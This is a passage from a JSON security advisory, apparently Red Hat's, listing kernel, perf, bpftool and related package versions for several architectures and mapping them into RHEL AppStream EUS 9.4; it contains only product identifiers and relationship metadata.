}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"product": {
"name": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"product_id": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-devel@5.14.0-427.114.1.el9_4?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"product": {
"name": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"product_id": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-devel-matched@5.14.0-427.114.1.el9_4?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"product": {
"name": "kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"product_id": "kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-devel@5.14.0-427.114.1.el9_4?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"product": {
"name": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"product_id": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-devel-matched@5.14.0-427.114.1.el9_4?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"product": {
"name": "kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"product_id": "kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-zfcpdump-devel@5.14.0-427.114.1.el9_4?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"product": {
"name": "kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"product_id": "kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-zfcpdump-devel-matched@5.14.0-427.114.1.el9_4?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "perf-0:5.14.0-427.114.1.el9_4.s390x",
"product": {
"name": "perf-0:5.14.0-427.114.1.el9_4.s390x",
"product_id": "perf-0:5.14.0-427.114.1.el9_4.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/perf@5.14.0-427.114.1.el9_4?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "rtla-0:5.14.0-427.114.1.el9_4.s390x",
"product": {
"name": "rtla-0:5.14.0-427.114.1.el9_4.s390x",
"product_id": "rtla-0:5.14.0-427.114.1.el9_4.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rtla@5.14.0-427.114.1.el9_4?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "rv-0:5.14.0-427.114.1.el9_4.s390x",
"product": {
"name": "rv-0:5.14.0-427.114.1.el9_4.s390x",
"product_id": "rv-0:5.14.0-427.114.1.el9_4.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rv@5.14.0-427.114.1.el9_4?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"product": {
"name": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"product_id": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bpftool-debuginfo@7.3.0-427.114.1.el9_4?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"product": {
"name": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"product_id": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-debuginfo@5.14.0-427.114.1.el9_4?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"product": {
"name": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"product_id": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debuginfo@5.14.0-427.114.1.el9_4?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"product": {
"name": "kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"product_id": "kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debuginfo-common-s390x@5.14.0-427.114.1.el9_4?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"product": {
"name": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"product_id": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-debuginfo@5.14.0-427.114.1.el9_4?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"product": {
"name": "kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"product_id": "kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-zfcpdump-debuginfo@5.14.0-427.114.1.el9_4?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"product": {
"name": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"product_id": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libperf-debuginfo@5.14.0-427.114.1.el9_4?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"product": {
"name": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"product_id": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/perf-debuginfo@5.14.0-427.114.1.el9_4?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"product": {
"name": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"product_id": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-perf-debuginfo@5.14.0-427.114.1.el9_4?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"product": {
"name": "bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"product_id": "bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bpftool@7.3.0-427.114.1.el9_4?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-0:5.14.0-427.114.1.el9_4.s390x",
"product": {
"name": "kernel-0:5.14.0-427.114.1.el9_4.s390x",
"product_id": "kernel-0:5.14.0-427.114.1.el9_4.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel@5.14.0-427.114.1.el9_4?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"product": {
"name": "kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"product_id": "kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-core@5.14.0-427.114.1.el9_4?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"product": {
"name": "kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"product_id": "kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug@5.14.0-427.114.1.el9_4?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"product": {
"name": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"product_id": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-core@5.14.0-427.114.1.el9_4?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"product": {
"name": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"product_id": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules@5.14.0-427.114.1.el9_4?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"product": {
"name": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"product_id": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules-core@5.14.0-427.114.1.el9_4?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"product": {
"name": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"product_id": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules-extra@5.14.0-427.114.1.el9_4?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"product": {
"name": "kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"product_id": "kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules@5.14.0-427.114.1.el9_4?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"product": {
"name": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"product_id": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-core@5.14.0-427.114.1.el9_4?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"product": {
"name": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"product_id": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-extra@5.14.0-427.114.1.el9_4?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"product": {
"name": "kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"product_id": "kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools@5.14.0-427.114.1.el9_4?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"product": {
"name": "kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"product_id": "kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-zfcpdump@5.14.0-427.114.1.el9_4?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"product": {
"name": "kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"product_id": "kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-zfcpdump-core@5.14.0-427.114.1.el9_4?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"product": {
"name": "kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"product_id": "kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-zfcpdump-modules@5.14.0-427.114.1.el9_4?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"product": {
"name": "kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"product_id": "kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-zfcpdump-modules-core@5.14.0-427.114.1.el9_4?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"product": {
"name": "kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"product_id": "kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-zfcpdump-modules-extra@5.14.0-427.114.1.el9_4?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"product": {
"name": "python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"product_id": "python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-perf@5.14.0-427.114.1.el9_4?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "libperf-0:5.14.0-427.114.1.el9_4.s390x",
"product": {
"name": "libperf-0:5.14.0-427.114.1.el9_4.s390x",
"product_id": "libperf-0:5.14.0-427.114.1.el9_4.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libperf@5.14.0-427.114.1.el9_4?arch=s390x"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"product": {
"name": "kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"product_id": "kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-doc@5.14.0-427.114.1.el9_4?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"product": {
"name": "kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"product_id": "kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-abi-stablelists@5.14.0-427.114.1.el9_4?arch=noarch"
}
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-0:5.14.0-427.114.1.el9_4.src",
"product": {
"name": "kernel-0:5.14.0-427.114.1.el9_4.src",
"product_id": "kernel-0:5.14.0-427.114.1.el9_4.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel@5.14.0-427.114.1.el9_4?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "bpftool-0:7.3.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64"
},
"product_reference": "bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bpftool-0:7.3.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bpftool-0:7.3.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x"
},
"product_reference": "bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bpftool-0:7.3.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64"
},
"product_reference": "bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64"
},
"product_reference": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x"
},
"product_reference": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64"
},
"product_reference": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-427.114.1.el9_4.src as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src"
},
"product_reference": "kernel-0:5.14.0-427.114.1.el9_4.src",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch as a component of Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch"
},
"product_reference": "kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"relates_to_product_reference": "AppStream-9.4.0.Z.EUS"
},
{
